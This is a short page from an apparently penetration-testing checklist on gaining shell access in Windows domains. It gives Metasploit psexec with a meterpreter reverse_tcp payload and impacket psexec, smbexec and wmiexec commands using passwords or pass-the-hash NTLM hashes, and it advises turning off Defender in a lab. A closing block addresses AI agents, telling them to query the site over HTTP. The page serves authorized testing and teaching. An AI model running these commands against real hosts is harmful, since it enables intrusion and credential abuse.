# Shell Access

#### Metasploit

* Use `windows/smb/psexec` exploit with SMB username and password with domain.
* Use `windows/smb/psexec` exploit with SMB username and password hash(LM:NT hash) with domain.

Payload - `windows/x64/meterpreter/reverse_tcp`

{% hint style="info" %}
Ensure Virus and Threat Protection is turned off in Defender if using the above in a lab environment.
{% endhint %}

#### Impacket-psexec

```bash
# psexec with username+password
impacket-psexec candy.local/rzoro:'Password1'@192.168.46.133

# psexec with username+hash
impacket-psexec administrator@192.168.46.133 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f

# smbexec with username+hash
impacket-smbexec administrator@192.168.46.133 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f

# wmiexec with username+hash
impacket-wmiexec administrator@192.168.46.133 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
```

{% hint style="info" %}
Ensure Virus and Threat Protection is turned off in Defender if using the above in a lab environment.
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/post-compromise-attacks/shell-access.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.